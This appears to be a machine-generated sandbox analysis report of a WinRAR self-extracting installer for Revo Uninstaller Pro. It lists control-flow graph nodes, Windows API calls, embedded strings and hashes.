CloseHandle 23280->23284 23285 fecc33 MapViewOfFile 23280->23285 23281 fecc84 23567 fec891 23281->23567 23284->23274 23287 fecc44 __vswprintf_c_l 23285->23287 23288 fecc71 UnmapViewOfFile 23285->23288 23292 fec891 2 API calls 23287->23292 23288->23284 23294 fecc60 23292->23294 23293 fe83fc 8 API calls 23295 fecd4c DialogBoxParamW 23293->23295 23294->23288 23296 fecd86 23295->23296 23297 fecd9f 23296->23297 23298 fecd98 Sleep 23296->23298 23301 fecdad 23297->23301 23600 fe9ca1 23297->23600 23298->23297 23300 fecdcc DeleteObject 23302 fecde6 23300->23302 23303 fecde3 DeleteObject 23300->23303 23301->23300 23304 fece29 23302->23304 23305 fece17 23302->23305 23303->23302 23608 fe9b08 23304->23608 23306 fec8f0 3 API calls 23305->23306 23307 fece1d CloseHandle 23306->23307 23307->23304 23309 fece63 23310 ff6b34 GetModuleHandleW 23309->23310 23311 fee18e 23310->23311 23311->23230 23312 ff6c5d 23311->23312 23808 ff69da 23312->23808 23315->23212 23316->23226 23317->23232 23318->23218 23319->23238 23321 ff15eb ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 23320->23321 23333 ff268e 23321->23333 23324 ff15f9 23324->23240 23326 ff1601 23327 ff160c 23326->23327 23347 ff26ca DeleteCriticalSection 23326->23347 23327->23240 23375 ffacbc 23329->23375 23332 ff160f 8 API calls 3 library calls 23332->23241 23334 ff2697 23333->23334 23336 ff26c0 23334->23336 23337 ff15f5 23334->23337 23348 ff2905 23334->23348 23353 ff26ca DeleteCriticalSection 23336->23353 23337->23324 23339 ff1726 23337->23339 23368 ff281a 23339->23368 23341 ff1730 23342 ff173b 23341->23342 23373 ff28c8 6 API calls try_get_function 23341->23373 23342->23326 23344 ff1749 23345 ff1756 23344->23345 23374 ff1759 6 API calls ___vcrt_FlsFree 23344->23374 23345->23326 23347->23324 23354 ff26f9 23348->23354 23351 ff293c InitializeCriticalSectionAndSpinCount 23352 ff2928 23351->23352 23352->23334 23353->23337 23355 ff272d 23354->23355 23356 ff2729 23354->23356 23355->23351 23355->23352 
23356->23355 23357 ff274d 23356->23357 23361 ff2799 23356->23361 23357->23355 23359 ff2759 GetProcAddress 23357->23359 23360 ff2769 __crt_fast_encode_pointer 23359->23360 23360->23355 23362 ff27b6 23361->23362 23363 ff27c1 LoadLibraryExW 23361->23363 23362->23356 23364 ff27dd GetLastError 23363->23364 23365 ff27f5 23363->23365 23364->23365 23367 ff27e8 LoadLibraryExW 23364->23367 23365->23362 23366 ff280c FreeLibrary 23365->23366 23366->23362 23367->23365 23369 ff26f9 try_get_function 5 API calls 23368->23369 23370 ff2834 23369->23370 23371 ff284c TlsAlloc 23370->23371 23372 ff283d 23370->23372 23372->23341 23373->23344 23374->23342 23378 ffacd5 23375->23378 23376 fee203 ___delayLoadHelper2@8 5 API calls 23377 fedbcd 23376->23377 23377->23244 23377->23332 23378->23376 23380 fee623 GetStartupInfoW 23379->23380 23380->23257 23382 ffa7c5 23381->23382 23383 ffa7bc 23381->23383 23382->23260 23386 ffa6b2 23383->23386 23385->23260 23387 ff8516 _unexpected 38 API calls 23386->23387 23388 ffa6bf 23387->23388 23406 ffa7d1 23388->23406 23390 ffa6c7 23415 ffa446 23390->23415 23393 ffa6de 23393->23382 23394 ff7a8a __onexit 21 API calls 23395 ffa6ef 23394->23395 23396 ffa721 23395->23396 23422 ffa873 23395->23422 23399 ff7a50 _free 20 API calls 23396->23399 23399->23393 23400 ffa71c 23432 ff7ecc 20 API calls _abort 23400->23432 23402 ffa765 23402->23396 23433 ffa31c 26 API calls 23402->23433 23403 ffa739 23403->23402 23404 ff7a50 _free 20 API calls 23403->23404 23404->23402 23407 ffa7dd ___DestructExceptionObject 23406->23407 23408 ff8516 _unexpected 38 API calls 23407->23408 23413 ffa7e7 23408->23413 23410 ffa86b ___DestructExceptionObject 23410->23390 23413->23410 23414 ff7a50 _free 20 API calls 23413->23414 23434 ff7ad8 38 API calls _abort 23413->23434 23435 ff9931 EnterCriticalSection 23413->23435 23436 ffa862 LeaveCriticalSection _abort 23413->23436 23414->23413 23416 ff3356 __cftof 38 API calls 23415->23416 23417 ffa458 23416->23417 23418 ffa479 23417->23418 23419 ffa467 
GetOEMCP 23417->23419 23420 ffa490 23418->23420 23421 ffa47e GetACP 23418->23421 23419->23420 23420->23393 23420->23394 23421->23420 23423 ffa446 40 API calls 23422->23423 23424 ffa892 23423->23424 23427 ffa8e3 IsValidCodePage 23424->23427 23429 ffa899 23424->23429 23431 ffa908 ___scrt_fastfail 23424->23431 23425 fee203 ___delayLoadHelper2@8 5 API calls 23426 ffa714 23425->23426 23426->23400 23426->23403 23428 ffa8f5 GetCPInfo 23427->23428 23427->23429 23428->23429 23428->23431 23429->23425 23437 ffa51e GetCPInfo 23431->23437 23432->23396 23433->23396 23435->23413 23436->23413 23442 ffa558 23437->23442 23446 ffa602 23437->23446 23439 fee203 ___delayLoadHelper2@8 5 API calls 23441 ffa6ae 23439->23441 23441->23429 23447 ffb5ea 23442->23447 23445 ff97c2 __vswprintf_c_l 43 API calls 23445->23446 23446->23439 23448 ff3356 __cftof 38 API calls 23447->23448 23449 ffb60a MultiByteToWideChar 23448->23449 23451 ffb648 23449->23451 23459 ffb6e0 23449->23459 23454 ff7a8a __onexit 21 API calls 23451->23454 23456 ffb669 __vsnwprintf_l ___scrt_fastfail 23451->23456 23452 fee203 ___delayLoadHelper2@8 5 API calls 23455 ffa5b9 23452->23455 23453 ffb6da 23466 ff980d 20 API calls _free 23453->23466 23454->23456 23461 ff97c2 23455->23461 23456->23453 23458 ffb6ae MultiByteToWideChar 23456->23458 23458->23453 23460 ffb6ca GetStringTypeW 23458->23460 23459->23452 23460->23453 23462 ff3356 __cftof 38 API calls 23461->23462 23463 ff97d5 23462->23463 23467 ff95a5 23463->23467 23466->23459 23468 ff95c0 __vswprintf_c_l 23467->23468 23469 ff95e6 MultiByteToWideChar 23468->23469 23470 ff979a 23469->23470 23471 ff9610 23469->23471 23472 fee203 ___delayLoadHelper2@8 5 API calls 23470->23472 23474 ff7a8a __onexit 21 API calls 23471->23474 23477 ff9631 __vsnwprintf_l 23471->23477 23473 ff97ad 23472->23473 23473->23445 23474->23477 23475 ff967a MultiByteToWideChar 23476 ff96e6 23475->23476 23478 ff9693 23475->23478 23503 ff980d 20 API calls _free 23476->23503 23477->23475 23477->23476 23494 ff9c64 
23478->23494 23482 ff96bd 23482->23476 23485 ff9c64 __vswprintf_c_l 11 API calls 23482->23485 23483 ff96f5 23484 ff7a8a __onexit 21 API calls 23483->23484 23487 ff9716 __vsnwprintf_l 23483->23487 23484->23487 23485->23476 23486 ff978b 23502 ff980d 20 API calls _free 23486->23502 23487->23486 23488 ff9c64 __vswprintf_c_l 11 API calls 23487->23488 23490 ff976a 23488->23490 23490->23486 23491 ff9779 WideCharToMultiByte 23490->23491 23491->23486 23492 ff97b9 23491->23492 23504 ff980d 20 API calls _free 23492->23504 23495 ff9990 _unexpected 5 API calls 23494->23495 23496 ff9c8b 23495->23496 23498 ff9c94 23496->23498 23505 ff9cec 10 API calls 3 library calls 23496->23505 23500 fee203 ___delayLoadHelper2@8 5 API calls 23498->23500 23499 ff9cd4 LCMapStringW 23499->23498 23501 ff96aa 23500->23501 23501->23476 23501->23482 23501->23483 23502->23476 23503->23470 23504->23476 23505->23499 23507 fed940 23506->23507 23508 fdfd53 GetModuleHandleW 23507->23508 23509 fdfd6d GetProcAddress 23508->23509 23510 fdfdbe 23508->23510 23511 fdfd96 GetProcAddress 23509->23511 23512 fdfd86 23509->23512 23513 fe00f3 GetModuleFileNameW 23510->23513 23619 ff6662 42 API calls 2 library calls 23510->23619 23511->23510 23514 fdfda2 23511->23514 23512->23511 23526 fe010e 23513->23526 23514->23510 23516 fe0031 23516->23513 23517 fe003c GetModuleFileNameW CreateFileW 23516->23517 23518 fe006b SetFilePointer 23517->23518 23519 fe00e7 CloseHandle 23517->23519 23518->23519 23520 fe007b ReadFile 23518->23520 23519->23513 23520->23519 23523 fe009a 23520->23523 23523->23519 23525 fdfcfd 2 API calls 23523->23525 23524 fe0143 CompareStringW 23524->23526 23525->23523 23526->23524 23527 fe0179 GetFileAttributesW 23526->23527 23528 fe018d 23526->23528 23610 fda995 23526->23610 23613 fdfcfd 23526->23613 23527->23526 23527->23528 23529 fe019a 23528->23529 23532 fe01cc 23528->23532 23531 fe01b2 GetFileAttributesW 23529->23531 23533 fe01c6 23529->23533 23530 fe02db 23554 fe95f8 GetCurrentDirectoryW 23530->23554 
23531->23529 23531->23533 23532->23530 23534 fda995 GetVersionExW 23532->23534 23533->23532 23535 fe01e6 23534->23535 23536 fe01ed 23535->23536 23537 fe0253 23535->23537 23539 fdfcfd 2 API calls 23536->23539 23538 fd3e41 _swprintf 51 API calls 23537->23538 23540 fe027b AllocConsole 23538->23540 23541 fe01f7 23539->23541 23542 fe0288 GetCurrentProcessId AttachConsole 23540->23542 23543 fe02d3 ExitProcess 23540->23543 23544 fdfcfd 2 API calls 23541->23544 23620 ff2b33 23542->23620 23546 fe0201 23544->23546 23547 fdda42 53 API calls 23546->23547 23549 fe021c 23547->23549 23548 fe02a9 GetStdHandle WriteConsoleW Sleep FreeConsole 23548->23543 23550 fd3e41 _swprintf 51 API calls 23549->23550 23551 fe022f 23550->23551 23552 fdda42 53 API calls 23551->23552 23553 fe023e 23552->23553 23553->23543 23554->23267 23556 fdfcfd 2 API calls 23555->23556 23557 fe9ab4 OleInitialize 23556->23557 23558 fe9ad7 GdiplusStartup SHGetMalloc 23557->23558 23558->23269 23560 fe103b IsDBCSLeadByte 23559->23560 23560->23560 23561 fe1053 23560->23561 23561->23271 23563 feb360 23562->23563 23564 feb476 23563->23564 23565 fe1401 CharUpperW 23563->23565 23622 fde90c 23563->23622 23564->23280 23564->23281 23565->23563 23568 fed940 23567->23568 23569 fec89e SetEnvironmentVariableW 23568->23569 23571 fec8c1 23569->23571 23570 fec8e9 23570->23274 23571->23570 23572 fec8dd SetEnvironmentVariableW 23571->23572 23572->23570 23574 fea519 23573->23574 23575 fea522 GetObjectW 23573->23575 23653 fe963a 12 API calls __vswprintf_c_l 23574->23653 23648 fe952a 23575->23648 23578 fea520 23578->23575 23580 fea575 23592 fdcfab 23580->23592 23581 fea555 23655 fe958c GetDC GetDeviceCaps ReleaseDC 23581->23655 23582 fea543 23654 fe963a 12 API calls __vswprintf_c_l 23582->23654 23585 fea54a 23585->23581 23588 fea550 DeleteObject 23585->23588 23586 fea55d 23656 fe9549 GetDC GetDeviceCaps ReleaseDC 23586->23656 23588->23581 23589 fea566 23657 fe975d 8 API calls ___scrt_fastfail 23589->23657 23591 fea56d DeleteObject 
23591->23580 23660 fdcfd0 23592->23660 23594 fdcfb7 23700 fdd6c1 GetModuleHandleW FindResourceW 23594->23700 23597 fe83fc 23795 fed82c 23597->23795 23602 fe9cae 23600->23602 23601 fe9d3c 23601->23301 23602->23601 23804 fe1432 23602->23804 23604 fe9cd6 23604->23601 23807 fe9a8d SetCurrentDirectoryW 23604->23807 23606 fe9ce4 ___scrt_fastfail 23607 fe9d18 SHFileOperationW 23606->23607 23607->23601 23609 fe9b2e GdiplusShutdown CoUninitialize 23608->23609 23609->23309 23611 fda9a9 GetVersionExW 23610->23611 23612 fda9e5 23610->23612 23611->23612 23612->23526 23614 fed940 23613->23614 23615 fdfd0a GetSystemDirectoryW 23614->23615 23616 fdfd40 23615->23616 23617 fdfd22 23615->23617 23616->23526 23618 fdfd33 LoadLibraryW 23617->23618 23618->23616 23619->23516 23621 ff2b3b 23620->23621 23621->23548 23621->23621 23623 fde932 23622->23623 23624 fde91b ___scrt_fastfail 23622->23624 23626 fde821 23623->23626 23624->23563 23627 fde832 __vswprintf_c_l 23626->23627 23630 fde862 23627->23630 23631 fde878 23630->23631 23632 fde86e 23630->23632 23634 fde8e2 GetCurrentProcessId 23631->23634 23635 fde898 23631->23635 23640 fde7e3 23632->23640 23639 fde85c 23634->23639 23635->23639 23646 fd6cce 74 API calls __vswprintf_c_l 23635->23646 23637 fde8b3 pre_c_initialization 23647 fd6cc9 RaiseException FindHandler 23637->23647 23639->23624 23641 fde7ec 23640->23641 23645 fde81b 23640->23645 23642 fdfcfd 2 API calls 23641->23642 23643 fde7f6 23642->23643 23644 fde7fc GetProcAddress GetProcAddress 23643->23644 23643->23645 23644->23645 23645->23631 23646->23637 23647->23639 23658 fe9549 GetDC GetDeviceCaps ReleaseDC 23648->23658 23650 fe9531 23651 fe953d 23650->23651 23659 fe958c GetDC GetDeviceCaps ReleaseDC 23650->23659 23651->23580 23651->23581 23651->23582 23653->23578 23654->23585 23655->23586 23656->23589 23657->23591 23658->23650 23659->23651 23661 fdcfde _wcschr __EH_prolog 23660->23661 23662 fdd00d GetModuleFileNameW 23661->23662 23663 fdd03e 23661->23663 23664 fdd027 23662->23664 
23702 fd9768 23663->23702 23664->23663 23667 fdd09a 23713 ff5030 26 API calls 3 library calls 23667->23713 23669 fe3393 76 API calls 23671 fdd06e 23669->23671 23671->23667 23671->23669 23695 fdd2ba 23671->23695 23672 fdd0ad 23714 ff5030 26 API calls 3 library calls 23672->23714 23674 fdd1f6 23675 fd9a4c 77 API calls 23674->23675 23674->23695 23678 fdd210 ___std_exception_copy 23675->23678 23679 fd9979 80 API calls 23678->23679 23678->23695 23682 fdd239 ___std_exception_copy 23679->23682 23681 fdd0bf 23681->23674 23681->23695 23715 fd9b57 23681->23715 23730 fd9979 23681->23730 23738 fd9a4c 23681->23738 23682->23695 23697 fdd245 ___std_exception_copy 23682->23697 23743 fe0fde MultiByteToWideChar 23682->23743 23684 fdd3bb 23744 fdcb33 76 API calls 23684->23744 23686 fdd683 23749 fdcb33 76 API calls 23686->23749 23688 fdd673 23688->23594 23689 fdd3fe 23745 ff5030 26 API calls 3 library calls 23689->23745 23691 fdd418 23746 ff5030 26 API calls 3 library calls 23691->23746 23692 fdd3cf 23692->23689 23694 fe3393 76 API calls 23692->23694 23694->23692 23723 fd946e 23695->23723 23696 fe11fa WideCharToMultiByte 23696->23697 23697->23684 23697->23686 23697->23688 23697->23695 23697->23696 23747 fdd9dc 50 API calls __vsnprintf 23697->23747 23748 ff4e71 26 API calls 3 library calls 23697->23748 23701 fdcfbe 23700->23701 23701->23597 23703 fd9772 23702->23703 23704 fd97f1 CreateFileW 23703->23704 23705 fd9811 GetLastError 23704->23705 23711 fd9862 23704->23711 23706 fdb32c 2 API calls 23705->23706 23709 fd9831 23706->23709 23707 fd987f SetFileTime 23708 fd9899 23707->23708 23708->23671 23710 fd9835 CreateFileW GetLastError 23709->23710 23709->23711 23712 fd9859 23710->23712 23711->23707 23711->23708 23712->23711 23713->23672 23714->23681 23716 fd9b7b SetFilePointer 23715->23716 23717 fd9b6a 23715->23717 23718 fd9b99 GetLastError 23716->23718 23721 fd9bb4 23716->23721 23717->23721 23750 fd6de2 75 API calls 23717->23750 23720 fd9ba3 23718->23720 23718->23721 23720->23721 23751 

Control-flow Graph

APIs
  • Part of subcall function 00FDFD49: GetModuleHandleW.KERNEL32 ref: 00FDFD61
  • Part of subcall function 00FDFD49: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00FDFD79
  • Part of subcall function 00FDFD49: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00FDFD9C
  • Part of subcall function 00FE95F8: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00FE9600
  • Part of subcall function 00FE9AA0: OleInitialize.OLE32(00000000), ref: 00FE9AB9
  • Part of subcall function 00FE9AA0: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00FE9AF0
  • Part of subcall function 00FE9AA0: SHGetMalloc.SHELL32(010175C0), ref: 00FE9AFA
  • Part of subcall function 00FE1017: GetCPInfo.KERNEL32(00000000,?), ref: 00FE1028
  • Part of subcall function 00FE1017: IsDBCSLeadByte.KERNEL32(00000000), ref: 00FE103C
• GetCommandLineW.KERNEL32 ref: 00FECC00
• OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00FECC27
• MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00FECC38
• UnmapViewOfFile.KERNEL32(00000000), ref: 00FECC72
  • Part of subcall function 00FEC891: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00FEC8A7
  • Part of subcall function 00FEC891: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00FEC8E3
• CloseHandle.KERNEL32(00000000), ref: 00FECC7B
• GetModuleFileNameW.KERNEL32(00000000,0102CE18,00000800), ref: 00FECC96
• SetEnvironmentVariableW.KERNEL32(sfxname,0102CE18), ref: 00FECCA8
• GetLocalTime.KERNEL32(?), ref: 00FECCAF
• _swprintf.LIBCMT ref: 00FECCEE
• SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00FECD00
• GetModuleHandleW.KERNEL32(00000000), ref: 00FECD03
• LoadIconW.USER32(00000000,00000064), ref: 00FECD1A
• DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001A5D1,00000000), ref: 00FECD6B
• Sleep.KERNEL32(?), ref: 00FECD99
• DeleteObject.GDI32 ref: 00FECDD8
• DeleteObject.GDI32(?), ref: 00FECDE4
• CloseHandle.KERNEL32 ref: 00FECE23
Strings
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
• String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Program Files\VS Revo Group\Revo Uninstaller Pro$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
• API String ID: 788466649-1997235929
• Opcode ID: eca1adf1ecf37fe21d90ca57140ef7ae3d72a0df43c6f661e1cc26c8ba063fb3
• Instruction ID: bfbc5e344edb2db2c0366db901b8e3462a7884047676e2ae5d0330bf2f306633
• Opcode Fuzzy Hash: eca1adf1ecf37fe21d90ca57140ef7ae3d72a0df43c6f661e1cc26c8ba063fb3
• Instruction Fuzzy Hash: D2611631900390AFD331BBA2EC49F6B3BACAB48710F040429F9C596185DBBE9D45E7A1

Control-flow Graph
APIs
• FindFirstFileW.KERNEL32(?,?,?,?,?,?,00FDA1DA,000000FF,?,?), ref: 00FDA314
• FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,00FDA1DA,000000FF,?,?), ref: 00FDA34A
• GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00FDA1DA,000000FF,?,?), ref: 00FDA352
• FindNextFileW.KERNEL32(?,?,?,?,?,?,00FDA1DA,000000FF,?,?), ref: 00FDA37A
• GetLastError.KERNEL32(?,?,?,?,00FDA1DA,000000FF,?,?), ref: 00FDA386
Similarity
• API ID: FileFind$ErrorFirstLast$Next
• String ID:
• API String ID: 869497890-0
• Opcode ID: 94291e3e8d27ab93a3f218a09f4f5af35b730c4accdaddaa7ab48cd55c75daa5
• Instruction ID: 1c834f97587d87a78e53c612c5bd297717cbd6bd5e024e5e6dc46eb26a38320b
• Opcode Fuzzy Hash: 94291e3e8d27ab93a3f218a09f4f5af35b730c4accdaddaa7ab48cd55c75daa5
• Instruction Fuzzy Hash: F841B672504385AFC324EF28C8C4ADAF3EABF48350F040A2AF5D9D3201D775A954DB96
APIs
• GetCurrentProcess.KERNEL32(?,?,00FF6AC9,?,0100A800,0000000C,00FF6C20,?,00000002,00000000), ref: 00FF6B14
• TerminateProcess.KERNEL32(00000000,?,00FF6AC9,?,0100A800,0000000C,00FF6C20,?,00000002,00000000), ref: 00FF6B1B
• ExitProcess.KERNEL32 ref: 00FF6B2D
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                                                            • Opcode ID: e8ca3729eeb8aa0011142c75201f2351c70257869c4b726a5a1c810bf7e82cd6
                                                                                                                                                                            • Instruction ID: afca823d21247a2c18428dc9b675fcacdf46720f289965e537f396589c97a3a5
                                                                                                                                                                            • Opcode Fuzzy Hash: e8ca3729eeb8aa0011142c75201f2351c70257869c4b726a5a1c810bf7e82cd6
                                                                                                                                                                            • Instruction Fuzzy Hash: A1E0B63540020CABDF22AF64D94DAA83F6AEF84755F104414FB49CA132CF7ADD52EB90
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prolog_memcmp
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3004599000-0
                                                                                                                                                                            • Opcode ID: f4d76c82067bcbbaa71cdf75f63e1b243fc76325c63f164843ee785e5368c619
                                                                                                                                                                            • Instruction ID: 9996d5b194d432b43fbf986bcec4788b7e1630b3c0c1021ce02450d9f0f83899
                                                                                                                                                                            • Opcode Fuzzy Hash: f4d76c82067bcbbaa71cdf75f63e1b243fc76325c63f164843ee785e5368c619
                                                                                                                                                                            • Instruction Fuzzy Hash: AC823A31D04185AEDF15DF64C881BFA7BAABF05350F0C41BBE8499B342DB355A86EB60
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog.LIBCMT ref: 00FEA5D6
                                                                                                                                                                              • Part of subcall function 00FD12D7: GetDlgItem.USER32(00000000,00003021), ref: 00FD131B
                                                                                                                                                                              • Part of subcall function 00FD12D7: SetWindowTextW.USER32(00000000,010022E4), ref: 00FD1331
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                            • Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            • Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: H_prologItemTextWindow
                                                                                                                                                                            • String ID: "%s"%s$,>$-el -s2 "-d%s" "-sp%s"$<$@$C:\Program Files\VS Revo Group\Revo Uninstaller Pro$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                                                                                                            • API String ID: 810644672-2243906297
                                                                                                                                                                            • Opcode ID: 4f4e79d71605a4c3736124ee48fdecd34efd185685f4f114f1bea0d8ce1df49e
                                                                                                                                                                            • Instruction ID: a1954d9f5ad3e891e4cccb378727dd4c20c41203cc63460221e60ab39a08132e
                                                                                                                                                                            • Opcode Fuzzy Hash: 4f4e79d71605a4c3736124ee48fdecd34efd185685f4f114f1bea0d8ce1df49e
                                                                                                                                                                            • Instruction Fuzzy Hash: 6E4206719403C4BEEB32AFA1DC49FBE3B68AB05710F044059F684A61C5DBBE5D44EB62

Control-flow Graph (rendered graph not reproduced; see the API list below)
APIs
• GetModuleHandleW.KERNEL32 ref: 00FDFD61
• GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00FDFD79
• GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00FDFD9C
• GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00FE0047
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FE005F
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00FE0071
• ReadFile.KERNEL32(00000000,?,00007FFE,010028D4,00000000), ref: 00FE0090
• CloseHandle.KERNEL32(00000000), ref: 00FE00E8
• GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00FE00FE
• CompareStringW.KERNEL32(00000400,00001001,01002920,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 00FE0158
• GetFileAttributesW.KERNEL32(?,?,010028EC,00000800,?,00000000,?,00000800), ref: 00FE0181
• GetFileAttributesW.KERNEL32(?,?,010029AC,00000800), ref: 00FE01BA
  • Part of subcall function 00FDFCFD: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00FDFD18
  • Part of subcall function 00FDFCFD: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,00FDE7F6,Crypt32.dll,?,00FDE878,?,00FDE85C,?,?,?,?), ref: 00FDFD3A
• _swprintf.LIBCMT ref: 00FE022A
• _swprintf.LIBCMT ref: 00FE0276
  • Part of subcall function 00FD3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FD3E54
• AllocConsole.KERNEL32 ref: 00FE027E
• GetCurrentProcessId.KERNEL32 ref: 00FE0288
• AttachConsole.KERNEL32(00000000), ref: 00FE028F
• GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00FE02B5
• WriteConsoleW.KERNEL32(00000000), ref: 00FE02BC
• Sleep.KERNEL32(00002710), ref: 00FE02C7
• FreeConsole.KERNEL32 ref: 00FE02CD
• ExitProcess.KERNEL32 ref: 00FE02D5
Strings
Memory Dump Source
• Source File: 00000010.00000002.2716128477.0000000000FD1000.00000020.00000001.01000000.00000012.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000010.00000002.2716022294.0000000000FD0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716176964.0000000001002000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.000000000100D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001014000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716234639.0000000001030000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2716361682.0000000001031000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_fd0000_PACK.jbxd
Similarity
• API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
• String ID: )$ *$$+$(,$(-$(.$4*$8)$<+$@,$@-$@.$DXGIDebug.dll$L*$P)$P,$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$X+$X-$`.$d*$dwmapi.dll$h)$kernel32$l,$p+$p-$t*$t.$uxtheme.dll$($+$,
• API String ID: 1201351596-3107305897
• Opcode ID: 13313f60454e39b9b490d0ac19fe28087978096d0adc35cdd9ada3088c21fd04
• Instruction ID: 54e4df77f9dc1f4546f533d37fd79f7ca8fc5c6418bac89d3b962787772fdc22
• Opcode Fuzzy Hash: 13313f60454e39b9b490d0ac19fe28087978096d0adc35cdd9ada3088c21fd04
• Instruction Fuzzy Hash: 5DD192B14083849BE63ADF51C84CF9FBBE9AF85304F50491EF2C99A281CB748548DB63

Control-flow Graph (rendered graph not reproduced; see the API list below)
APIs
• __EH_prolog.LIBCMT ref: 00FDCFD9
• _wcschr.LIBVCRUNTIME ref: 00FDCFFA
• GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00FDD015
• __fprintf_l.LIBCMT ref: 00FDD4FB
